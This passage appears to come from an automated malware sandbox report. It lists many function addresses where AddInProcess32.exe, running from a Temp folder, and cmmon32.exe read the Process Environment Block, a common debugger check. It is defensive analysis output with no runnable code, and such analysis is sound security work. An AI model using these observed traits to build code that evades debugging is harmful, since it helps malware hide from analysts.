Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184F0BF mov eax, dword ptr fs:[00000030h]	5_2_0184F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E8CD6 mov eax, dword ptr fs:[00000030h]	5_2_018E8CD6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]	5_2_018AB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018AB8D0 mov ecx, dword ptr fs:[00000030h]	5_2_018AB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]	5_2_018AB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]	5_2_018AB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]	5_2_018AB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018AB8D0 mov eax, dword ptr fs:[00000030h]	5_2_018AB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018158EC mov eax, dword ptr fs:[00000030h]	5_2_018158EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D14FB mov eax, dword ptr fs:[00000030h]	5_2_018D14FB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01896CF0 mov eax, dword ptr fs:[00000030h]	5_2_01896CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01896CF0 mov eax, dword ptr fs:[00000030h]	5_2_01896CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01896CF0 mov eax, dword ptr fs:[00000030h]	5_2_01896CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E740D mov eax, dword ptr fs:[00000030h]	5_2_018E740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E740D mov eax, dword ptr fs:[00000030h]	5_2_018E740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E740D mov eax, dword ptr fs:[00000030h]	5_2_018E740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01896C0A mov eax, dword ptr fs:[00000030h]	5_2_01896C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01896C0A mov eax, dword ptr fs:[00000030h]	5_2_01896C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01896C0A mov eax, dword ptr fs:[00000030h]	5_2_01896C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01896C0A mov eax, dword ptr fs:[00000030h]	5_2_01896C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1C06 mov eax, dword ptr fs:[00000030h]	5_2_018D1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E4015 mov eax, dword ptr fs:[00000030h]	5_2_018E4015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E4015 mov eax, dword ptr fs:[00000030h]	5_2_018E4015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01897016 mov eax, dword ptr fs:[00000030h]	5_2_01897016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01897016 mov eax, dword ptr fs:[00000030h]	5_2_01897016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01897016 mov eax, dword ptr fs:[00000030h]	5_2_01897016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182B02A mov eax, dword ptr fs:[00000030h]	5_2_0182B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182B02A mov eax, dword ptr fs:[00000030h]	5_2_0182B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182B02A mov eax, dword ptr fs:[00000030h]	5_2_0182B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182B02A mov eax, dword ptr fs:[00000030h]	5_2_0182B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184BC2C mov eax, dword ptr fs:[00000030h]	5_2_0184BC2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]	5_2_0184002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]	5_2_0184002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]	5_2_0184002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]	5_2_0184002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184002D mov eax, dword ptr fs:[00000030h]	5_2_0184002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184A44B mov eax, dword ptr fs:[00000030h]	5_2_0184A44B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01830050 mov eax, dword ptr fs:[00000030h]	5_2_01830050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01830050 mov eax, dword ptr fs:[00000030h]	5_2_01830050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018AC450 mov eax, dword ptr fs:[00000030h]	5_2_018AC450
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018AC450 mov eax, dword ptr fs:[00000030h]	5_2_018AC450
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0183746D mov eax, dword ptr fs:[00000030h]	5_2_0183746D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E1074 mov eax, dword ptr fs:[00000030h]	5_2_018E1074
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D2073 mov eax, dword ptr fs:[00000030h]	5_2_018D2073
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D138A mov eax, dword ptr fs:[00000030h]	5_2_018D138A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018CD380 mov ecx, dword ptr fs:[00000030h]	5_2_018CD380
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01821B8F mov eax, dword ptr fs:[00000030h]	5_2_01821B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01821B8F mov eax, dword ptr fs:[00000030h]	5_2_01821B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01842397 mov eax, dword ptr fs:[00000030h]	5_2_01842397
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184B390 mov eax, dword ptr fs:[00000030h]	5_2_0184B390
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01828794 mov eax, dword ptr fs:[00000030h]	5_2_01828794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01897794 mov eax, dword ptr fs:[00000030h]	5_2_01897794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01897794 mov eax, dword ptr fs:[00000030h]	5_2_01897794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01897794 mov eax, dword ptr fs:[00000030h]	5_2_01897794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01844BAD mov eax, dword ptr fs:[00000030h]	5_2_01844BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01844BAD mov eax, dword ptr fs:[00000030h]	5_2_01844BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01844BAD mov eax, dword ptr fs:[00000030h]	5_2_01844BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E5BA5 mov eax, dword ptr fs:[00000030h]	5_2_018E5BA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018953CA mov eax, dword ptr fs:[00000030h]	5_2_018953CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018953CA mov eax, dword ptr fs:[00000030h]	5_2_018953CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]	5_2_018403E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]	5_2_018403E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]	5_2_018403E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]	5_2_018403E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]	5_2_018403E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018403E2 mov eax, dword ptr fs:[00000030h]	5_2_018403E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0183DBE9 mov eax, dword ptr fs:[00000030h]	5_2_0183DBE9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018537F5 mov eax, dword ptr fs:[00000030h]	5_2_018537F5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E070D mov eax, dword ptr fs:[00000030h]	5_2_018E070D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E070D mov eax, dword ptr fs:[00000030h]	5_2_018E070D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184A70E mov eax, dword ptr fs:[00000030h]	5_2_0184A70E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184A70E mov eax, dword ptr fs:[00000030h]	5_2_0184A70E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0183F716 mov eax, dword ptr fs:[00000030h]	5_2_0183F716
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D131B mov eax, dword ptr fs:[00000030h]	5_2_018D131B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018AFF10 mov eax, dword ptr fs:[00000030h]	5_2_018AFF10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018AFF10 mov eax, dword ptr fs:[00000030h]	5_2_018AFF10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01814F2E mov eax, dword ptr fs:[00000030h]	5_2_01814F2E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01814F2E mov eax, dword ptr fs:[00000030h]	5_2_01814F2E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184E730 mov eax, dword ptr fs:[00000030h]	5_2_0184E730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181DB40 mov eax, dword ptr fs:[00000030h]	5_2_0181DB40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182EF40 mov eax, dword ptr fs:[00000030h]	5_2_0182EF40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E8B58 mov eax, dword ptr fs:[00000030h]	5_2_018E8B58
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181F358 mov eax, dword ptr fs:[00000030h]	5_2_0181F358
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181DB60 mov ecx, dword ptr fs:[00000030h]	5_2_0181DB60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182FF60 mov eax, dword ptr fs:[00000030h]	5_2_0182FF60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E8F6A mov eax, dword ptr fs:[00000030h]	5_2_018E8F6A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01843B7A mov eax, dword ptr fs:[00000030h]	5_2_01843B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01843B7A mov eax, dword ptr fs:[00000030h]	5_2_01843B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018AFE87 mov eax, dword ptr fs:[00000030h]	5_2_018AFE87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184D294 mov eax, dword ptr fs:[00000030h]	5_2_0184D294
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184D294 mov eax, dword ptr fs:[00000030h]	5_2_0184D294
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]	5_2_018152A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]	5_2_018152A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]	5_2_018152A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]	5_2_018152A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018152A5 mov eax, dword ptr fs:[00000030h]	5_2_018152A5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E0EA5 mov eax, dword ptr fs:[00000030h]	5_2_018E0EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E0EA5 mov eax, dword ptr fs:[00000030h]	5_2_018E0EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E0EA5 mov eax, dword ptr fs:[00000030h]	5_2_018E0EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018946A7 mov eax, dword ptr fs:[00000030h]	5_2_018946A7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182AAB0 mov eax, dword ptr fs:[00000030h]	5_2_0182AAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182AAB0 mov eax, dword ptr fs:[00000030h]	5_2_0182AAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184FAB0 mov eax, dword ptr fs:[00000030h]	5_2_0184FAB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01858EC7 mov eax, dword ptr fs:[00000030h]	5_2_01858EC7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018436CC mov eax, dword ptr fs:[00000030h]	5_2_018436CC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018CFEC0 mov eax, dword ptr fs:[00000030h]	5_2_018CFEC0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01842ACB mov eax, dword ptr fs:[00000030h]	5_2_01842ACB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E8ED6 mov eax, dword ptr fs:[00000030h]	5_2_018E8ED6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018276E2 mov eax, dword ptr fs:[00000030h]	5_2_018276E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01842AE4 mov eax, dword ptr fs:[00000030h]	5_2_01842AE4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018416E0 mov ecx, dword ptr fs:[00000030h]	5_2_018416E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181C600 mov eax, dword ptr fs:[00000030h]	5_2_0181C600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181C600 mov eax, dword ptr fs:[00000030h]	5_2_0181C600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181C600 mov eax, dword ptr fs:[00000030h]	5_2_0181C600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01848E00 mov eax, dword ptr fs:[00000030h]	5_2_01848E00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018D1608 mov eax, dword ptr fs:[00000030h]	5_2_018D1608
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01828A0A mov eax, dword ptr fs:[00000030h]	5_2_01828A0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01815210 mov eax, dword ptr fs:[00000030h]	5_2_01815210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01815210 mov ecx, dword ptr fs:[00000030h]	5_2_01815210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01815210 mov eax, dword ptr fs:[00000030h]	5_2_01815210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01815210 mov eax, dword ptr fs:[00000030h]	5_2_01815210
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181AA16 mov eax, dword ptr fs:[00000030h]	5_2_0181AA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181AA16 mov eax, dword ptr fs:[00000030h]	5_2_0181AA16
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184A61C mov eax, dword ptr fs:[00000030h]	5_2_0184A61C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184A61C mov eax, dword ptr fs:[00000030h]	5_2_0184A61C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01833A1C mov eax, dword ptr fs:[00000030h]	5_2_01833A1C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181E620 mov eax, dword ptr fs:[00000030h]	5_2_0181E620
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01854A2C mov eax, dword ptr fs:[00000030h]	5_2_01854A2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01854A2C mov eax, dword ptr fs:[00000030h]	5_2_01854A2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018CFE3F mov eax, dword ptr fs:[00000030h]	5_2_018CFE3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01819240 mov eax, dword ptr fs:[00000030h]	5_2_01819240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01819240 mov eax, dword ptr fs:[00000030h]	5_2_01819240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01819240 mov eax, dword ptr fs:[00000030h]	5_2_01819240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01819240 mov eax, dword ptr fs:[00000030h]	5_2_01819240
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]	5_2_01827E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]	5_2_01827E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]	5_2_01827E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]	5_2_01827E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]	5_2_01827E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01827E41 mov eax, dword ptr fs:[00000030h]	5_2_01827E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018DAE44 mov eax, dword ptr fs:[00000030h]	5_2_018DAE44
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018DAE44 mov eax, dword ptr fs:[00000030h]	5_2_018DAE44
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018DEA55 mov eax, dword ptr fs:[00000030h]	5_2_018DEA55
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018A4257 mov eax, dword ptr fs:[00000030h]	5_2_018A4257
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018CB260 mov eax, dword ptr fs:[00000030h]	5_2_018CB260
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018CB260 mov eax, dword ptr fs:[00000030h]	5_2_018CB260
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E8A62 mov eax, dword ptr fs:[00000030h]	5_2_018E8A62
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182766D mov eax, dword ptr fs:[00000030h]	5_2_0182766D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]	5_2_0183AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]	5_2_0183AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]	5_2_0183AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]	5_2_0183AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0183AE73 mov eax, dword ptr fs:[00000030h]	5_2_0183AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0185927A mov eax, dword ptr fs:[00000030h]	5_2_0185927A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA14FB mov eax, dword ptr fs:[00000030h]	19_2_04EA14FB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E66CF0 mov eax, dword ptr fs:[00000030h]	19_2_04E66CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E66CF0 mov eax, dword ptr fs:[00000030h]	19_2_04E66CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E66CF0 mov eax, dword ptr fs:[00000030h]	19_2_04E66CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE58EC mov eax, dword ptr fs:[00000030h]	19_2_04DE58EC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]	19_2_04E7B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E7B8D0 mov ecx, dword ptr fs:[00000030h]	19_2_04E7B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]	19_2_04E7B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]	19_2_04E7B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]	19_2_04E7B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E7B8D0 mov eax, dword ptr fs:[00000030h]	19_2_04E7B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB8CD6 mov eax, dword ptr fs:[00000030h]	19_2_04EB8CD6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]	19_2_04E120A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]	19_2_04E120A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]	19_2_04E120A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]	19_2_04E120A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]	19_2_04E120A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E120A0 mov eax, dword ptr fs:[00000030h]	19_2_04E120A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DF849B mov eax, dword ptr fs:[00000030h]	19_2_04DF849B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E290AF mov eax, dword ptr fs:[00000030h]	19_2_04E290AF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04DE9080 mov eax, dword ptr fs:[00000030h]	19_2_04DE9080
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1F0BF mov ecx, dword ptr fs:[00000030h]	19_2_04E1F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1F0BF mov eax, dword ptr fs:[00000030h]	19_2_04E1F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1F0BF mov eax, dword ptr fs:[00000030h]	19_2_04E1F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E63884 mov eax, dword ptr fs:[00000030h]	19_2_04E63884
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E63884 mov eax, dword ptr fs:[00000030h]	19_2_04E63884
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E0746D mov eax, dword ptr fs:[00000030h]	19_2_04E0746D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EA2073 mov eax, dword ptr fs:[00000030h]	19_2_04EA2073
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04EB1074 mov eax, dword ptr fs:[00000030h]	19_2_04EB1074
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E1A44B mov eax, dword ptr fs:[00000030h]	19_2_04E1A44B
